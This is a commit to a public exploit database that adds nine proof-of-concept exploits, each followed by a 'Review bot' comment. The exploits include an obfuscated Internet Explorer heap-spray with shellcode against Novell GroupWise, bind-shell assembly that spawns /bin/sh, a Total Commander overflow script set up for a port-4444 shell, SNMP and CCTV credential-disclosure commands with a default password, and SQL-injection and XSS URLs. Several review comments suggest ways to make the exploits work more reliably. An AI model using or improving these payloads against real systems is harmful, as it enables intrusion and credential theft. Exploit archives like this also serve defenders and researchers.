DB: 2015-09-21

9 new exploits
This commit is contained in:
Offensive Security 2015-09-21 05:01:49 +00:00
parent 828e9ae3d0
commit c6421d54c9
11 changed files with 640 additions and 2 deletions


@ -472,7 +472,7 @@ id,file,description,date,author,platform,type,port
609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0
611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0 611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0
612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0
616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit (1)",2004-11-07,class101,windows,remote,80 616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80
618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808 619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808
620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25
@ -488,7 +488,7 @@ id,file,description,date,author,platform,type,port
631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0 631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0
634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0 634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0
635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (2)",2004-11-16,NoPh0BiA,windows,remote,80 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,80
637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25 637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25
638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110 638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
@ -34535,3 +34535,12 @@ id,file,description,date,author,platform,type,port
38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0
38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0 38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0
38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80 38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80
38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0
38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0
38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,"Glaysson dos Santos",hardware,webapps,0
38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection Vulnerability",2013-01-25,n3tw0rk,php,webapps,0
38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure Vulnerability",2013-01-29,"Alejandro Ramos",multiple,remote,0
38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0
38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Vulnerability",2013-01-24,hiphop,php,webapps,0
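Review bot: The date on the new 38249 row, `2012-01-28`, looks like a typo for 2013-01-28: the other SecurityFocus-sourced rows added in the same hunk (38246, 38248, 38250, 38251) all carry January 2013 dates and their BID numbers are consecutive with 57602, the source cited inside 38249.txt. If that is confirmed, the row should read `38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2013-01-28,Rapid7,multiple,dos,0`. The two modified rows higher up (616 and 636) are printed old-then-new without markers, so the rendering does not show which description variant is the new side.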



@ -0,0 +1,76 @@
# Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway
[MODEL: DWG849] Cable Modem Gateway
# Google Dork: n/a
# Date: 09/18/2015
# Exploit Author: Matt Dunlap
# Vendor Homepage:
http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways
# Software Link: n/a
# Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR:
2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>>
# Tested on: Ubuntu 14.04.3
# CVE : Not reported to vendor (yet)
Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849]
Cable Modem Gateway
Affected Product:
Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway
NOTE: The model DWG850-4 is open to the same attack but doesnt come with
the remote administration enabled (no web interface, no telnet)
Severity Rating:
Important
Impact:
Username and password for the user interface as well as wireless network
keys can be disclosed through SNMP.
At the time of posting this there are 61,505 results on Shodan for this
model.
By default there are 2 open ports: 161 (snmp), 8080 (web administration)
The default password of 4GIt3M has been set on every unit Ive tested so far
Description:
The Thomson CableHome Gateway DWG849 Cable Modem Gateway product
specifications include SNMP v2 & v3 under Network Management. The
management information bases (MIBs) of various device subsystems on the
DWG849 allows local\remote network users to discover user interface
credentials and wireless network key values through simple SNMP requests
for the value of these variables. Given the security authentication in
SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the
risk that the values can be disclosed through SNMP using the default
read-only community “private”.
Object Identifiers (OIDs):
Make, Model, Software Version:
1.3.6.1.2.1.1.1.0
1.3.6.1.2.1.1.3.0
Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M)
1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
SSID and KEY
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
Guest Network OIDs
Other OIDs of interest include
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34
1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35
[POC]
snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
This issue has not been reported to the vendor.
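Review bot: The advisory gives two different default web-UI passwords — `4GIt3M` in the impact section and `admin \ Uq-4GIt3M` next to the OIDs — and should state one value or say that the second is the full string. It also calls `private` the default read-only community while the PoC reads with `-c private`; on most agents `private` is the read-write community, and if that holds here the exposure is worse than disclosure (a remote `snmpset` against the same OIDs could change the UI password or wireless key), which is worth testing and stating explicitly. The PoC is wrapped over three lines and is a single `snmpget -t15 -v 2c -c private [host] OID1 OID2 OID3 OID4` invocation; since the issue was not reported to the vendor, a one-line mitigation (filter UDP/161 on the WAN side, change the community string, or disable v1/v2c in favour of v3 where the firmware allows it) would help operators.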


@ -0,0 +1,148 @@
1. *Advisory Information*
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
Date published: 2015-09-19
Date of last update: 2015-09-19
Vendors contacted: ADH-Web
Author: Glaysson dos Santos
Release mode: User release
2. *Vulnerability Information*
Class: Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name:
3. *Vulnerabilities*
3.1 ADH-Web Server IP-Cameras Improper Access Restrictions
3.1.1 Description
Due to improper access restriction the ADH-Web (item 4) device [1] allows a
remote attacker to browse and access arbitrary files from the following
directorie '/hdd0/logs'. you can also get numerous information
(important for a fingerprint step) via the parameter "variable" in
variable.cgi script.
3.1.2 Vulnerability Details
Usually this directory can be protected against
unauthenticated access (401 Unauthorized), though, it can access all files
directly without requiring authentication.As in the statement below:
[401]
. 'http://<target_ip>/hdd0/logs'
[200]
. 'http://<target_ip>/hdd0/logs/log.txt'
Most common logfiles:
. 'bak.txt
. 'connect.txt'
. 'log.txt'
. 'seclog.log'
. 'startup.txt'
. 'DBGLOG.TXT'
. 'access.txt'
. 'security.txt'
3.1.3 Impact
This could allow a remote attacker to obtain valuable information such as
access credentials, Network configuration and other sensitive information
in plain text.
Another problem identified is an information exposure via the parameter
"variable" in variable.cgi script. Knowing some variables can extract a
reasonable amount of information. For exemplo:
* DNS
. 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0'
* ftp master ftp console credenthials ((the development team said that this
credential is not used, then why does it exist?):
. '
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
'
. '
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
'
(although the vast majority of servers have ftp / telnet with anonymous
access allowed.)
* alarms
. 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0'
* camconfig
. 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1'
(includes, but is not limited to) There are a lot of variables [an audit
tool is on the way].
This servers also sends credentials (and other sensitive data) via GET
parameters
This is poor practice as the URL is liable to be logged in any number of
places
between the customer and the camera. The credentials should be passed in
the body
of a POST request (under SSL of course, here is not the case). .
(Is possible to create, edit and delete users and other configurations in
this way, dangerous)
4. *Vulnerable Products and Packages*
. The following products are affected:
- SD Advanced Closed IPTV
- SD Advanced
- EcoSense
- Digital Sprite 2
Other products/models are probably affected too, but they I not checked.
5. *Vendor Information, Solutions and Workarounds*
The vendor found that some things are not vulnerabilities (sensitive
information via GET, for example)
and others are useless (hardcoded credentials) and others are not yet so
critical (access to server logs).
I think that at least this information can assist during an intrusion test,
as will be shown soon.
6. *Credits*
This vulnerability was discovered by Glaysson dos Santos.
7. *Report Timeline*
. 2015-08-31:
Vendor has been notified about the vulnerabilities (without details yet).
. 2015-09-01:
Vendor acknowledges the receipt of the email and asks for technical
details.
. 2013-09-01:
A email with technical details is sent to vendor.
. 2013-09-11:
Still no response, another email was sent to the Vendor requesting any
opinion on the reported problems.
the following points were highlighted in this email:
* 1. No unauthenticated access [No web pages/URL parameters on the cameras
should be accessible without credentials.]
* 2. Credentials (and other sensitive data) via GET parameters
* 4. Use of hard-coded password
* 3. no SSL
. 2013-09-11:
The vendor reported that the matter was passed on to the team developed
and that it would contact me the following week (2015-09-14).
. 2013-09-14:
The development team responded by passing its consideration of the points
and
reported in accordance with this response the impact of these
vulnerabilities
is low and are no longer available unauthenticated using recent software
release (version 10212).
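Review bot: The report timeline is internally inconsistent: every entry from `2013-09-01` onward should presumably read 2015-09-xx, since the first two entries are dated 2015-08-31 and 2015-09-01 and the vendor's promised follow-up is given as 2015-09-14. The numbered points sent to the vendor are also out of order (`* 4. Use of hard-coded password` precedes `* 3. no SSL`). The vendor's statement that the log directory is no longer reachable unauthenticated in release 10212 is the only remediation information on the page, so section 5 should restate it as the fix (upgrade to 10212 or later, as claimed by the vendor and not independently verified here) and section 4 should list the firmware versions that were actually tested, since it currently names product lines with no version.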


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/57602/info
MiniUPnP is prone to multiple denial-of-service vulnerabilities.
Attackers can exploit these issues to cause denial-of-service conditions.
MiniUPnP versions prior to 1.4 are vulnerable.
M-SEARCH * HTTP/1.1
Host:239.255.255.250:1900
ST:uuid:schemas:device:MX:3< no CRLF >
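Review bot: The PoC gives only the datagram bytes and does not say how to deliver them or what the `< no CRLF >` marker means. I would add two lines above the request: `# send as a single UDP datagram to port 1900 on the target (the SSDP port named by the Host: header)` and `# the final line is deliberately sent without a terminating CRLF — make sure your tool does not append one`. Whether the missing terminator is what triggers the crash is not stated on the page, so it should be phrased as a delivery requirement rather than an explanation.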


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/57579/info
Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability.
Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks.
curl -v http://www.example.com/DVR.cfg | strings |grep -i USER
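Review bot: The PoC pipes the downloaded configuration through `strings | grep -i USER`, which shows only lines containing "USER" and discards the rest; the text says the file holds credentials but not under which field names, so a password stored under a different key or in non-printable form would be missed. Save the file first (`curl -s -o DVR.cfg http://<target>/DVR.cfg`) and inspect the whole thing (`strings DVR.cfg`, plus a hex dump for non-ASCII fields) before drawing conclusions. A sentence stating whether `DVR.cfg` is served without any authentication — the text implies it but never says so — would also help.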


@ -0,0 +1,248 @@
source: http://www.securityfocus.com/bid/57657/info
Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
The following versions are vulnerable:
Versions prior to 8.0.3 Hot Patch 2
Versions prior to GroupWise 2012 SP1 Hot Patch 1
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
<html>
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
<object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
<script language='javascript'>
function GyGguPonxZoADbtgXPS() {
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.KJZFzfumaV = "AAAA";
while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
this.KJZFzfumaV += this.KJZFzfumaV;
}
this.mem = new Array();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
void(Math.atan2(0xbabe, msg));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
if (enable == true)
void(Math.atan(0xbabe));
else
void(Math.asin(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
void(Math.acos(0xbabe));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
if (len > this.KJZFzfumaV.length)
throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
return this.KJZFzfumaV.substr(0, len);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
throw "Round argument cannot be 0";
return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
{
var digits = "0123456789ABCDEF";
var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
}
var width = (width ? width : 0);
while (beTBwoiJGBBhwyZg.length < width)
beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
return beTBwoiJGBBhwyZg;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();
if (typeof arg == "string" || arg instanceof String) {
this.mem[tag].push(arg.substr(0, arg.length));
}
else {
this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2));
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
delete this.mem[tag];
CollectGarbage();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
this.SWc("oleaut32");
for (var i = 0; i < 6; i++) {
this.nPdkLCpaz(32, "oleaut32");
this.nPdkLCpaz(64, "oleaut32");
this.nPdkLCpaz(256, "oleaut32");
this.nPdkLCpaz(32768, "oleaut32");
}
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768)
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
this.nPdkLCpaz(arg, tag);
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
this.SWc(tag);
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
this.mNhbOXqosTNKjGhfj("Running the garbage collector");
CollectGarbage();
this.AocZkxOTvEXwFTsIPMSanrManzYrte();
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
var count = (count ? count : 1);
for (var i = 0; i < count; i++) {
this.uYiBaSLpjlOJJdhFAb(arg);
this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
}
this.uYiBaSLpjlOJJdhFAb(arg);
this.K("ZsJjplNR");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
var count = (count ? count : 1);
for (var i = 0; i < count; i++)
this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
this.K("WbjLbPsZ");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
{
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
return this.heapBase + 0x688 + ((size+8)/8)*48;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var udIUhjCc = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
udIUhjCc += this.RBRfbU(jmpecx);
udIUhjCc += unescape("%u0028%u0028") +
shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
return udIUhjCc;
}
var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
var payload2 = unescape(
"%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
"%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
"%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
"%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
"%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
"%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
"");
var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
offset_length = 0x5F6;
junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(2, 0x40000 - 0x21);
for (var i=0; i < 250; i++) {
heap_obj.uYiBaSLpjlOJJdhFAb(block);
}
ctrl.InvokeContact(202116108)
</script>
</html>
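Review bot: `udIUhjCc` references an undefined global `heap` (`shellcode + heap.zoNWUcOOYegFinTDSbOSAAM(...)`); the only instance is `heap_obj`, and inside a prototype method the call should be `shellcode + this.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);`. It is a latent ReferenceError rather than a live one because nothing in the script invokes `udIUhjCc`, but anyone reusing the helper will hit it. The spray fills the heap up to the `0x0c0c0c0c` pointers embedded in `payload`, consistent with the header's "DEP Disabled" note, so a comment above `heap_obj` stating that the PoC requires a non-DEP, predictable-heap IE8/XP target would save readers from trying it elsewhere; the embedded `payload2` ends in the bytes for "calc", so it presumably launches calc.exe and should be regenerated before any use beyond demonstration.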


@ -66,6 +66,21 @@ start:
mov rax, r12 ;restore RAX mov rax, r12 ;restore RAX
syscall syscall
inc rsi
mov rax, r12 ;restore RAX
syscall
xor rsi,rsi ;zero out RSI
push rsi ;push NULL on stack
mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse)
push rdi ;push rdi to the stack
mov rdi, rsp ;store RSP (points to the command string) in RDI
xor rdx, rdx ;zero out RDX
sub r12b, 0x1f ;RAX = 0x000000000200003b execve
mov rax, r12 ;restore RAX
syscall ;trigger syscall
/* /*
$ nasm -f bin bind-shellcode.asm $ nasm -f bin bind-shellcode.asm
$ hexdump bind-shellcode $ hexdump bind-shellcode
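Review bot: The new execve block passes argv as NULL (`xor rsi,rsi` is still in effect when `syscall` runs) and envp as NULL; some kernels reject a NULL argv, so if the shell fails to spawn, build a real argv after `mov rdi, rsp`: `push rsi ; argv[1] = NULL`, `push rdi ; argv[0] = "//bin/sh"`, `mov rsi, rsp ; RSI = argv`. `sub r12b, 0x1f` only works because the previous syscall number left in r12 has a low byte of 0x5a (per the comment's result 0x200003b) and nothing between the dup2 calls and here clobbers r12, which is worth saying in the comment. The 0x2000000 syscall class implies a BSD/macOS target, but the file never names the OS; a header comment would help, since the `inc rsi`/dup2 loop and the syscall numbers do not transfer to Linux. The `start:` block begins before this hunk.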


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/57564/info
iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iCart Pro 4.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/forum/icart.php?do=editproduct&productid=19&section='
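Review bot: The PoC is a bare single quote in `section`, which demonstrates the injection only when the application echoes database errors; on a deployment with error display off it shows nothing. Add a boolean pair that works regardless of error reporting, e.g. `...&section=1' AND '1'='1` versus `...&section=1' AND '1'='2`, and state that a difference between the two responses confirms the flaw. The text names 4.0.1 as vulnerable and gives no fixed version, so readers should be told whether one exists.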


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/57664/info
The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP-Table Reloaded versions prior to 1.9.4 are vulnerable.
http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
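Review bot: The PoC injects through the `id` parameter of the bundled `zeroclipboard.swf`, so it only executes in a browser that runs Flash content; the page should say so, because the finding will not reproduce in a Flash-less browser even on an unpatched install. Worth adding beneath the URL: `# requires a browser with Flash Player; the payload breaks out of the script call the SWF builds from 'id'` — that mechanism is my reading of the `\"))}catch(e){...}//` shape of the payload, so confirm before stating it as fact. The remediation, upgrading to 1.9.4 or later as the text says, could be stated explicitly alongside removing the SWF where the copy-to-clipboard feature is unused.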


@ -0,0 +1,51 @@
#!/usr/bin/python
# EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Un_N0n
# Date of Testing: 19th September 2015
# Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
# Tested On : Windows 10
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called time.txt
# Step 3: Copy the contents of time.txt file
# Step 4: Now open Total Commander 8.52
# Step 5: Go To file > Change Attributes.
# Step 6: In time field paste the contents of time.txt
# Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc
file = open('time.txt' , 'wb');
buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
# msfvenom -p windows/shell_bind_tcp -f c -b '\x00\x0a\x0d'
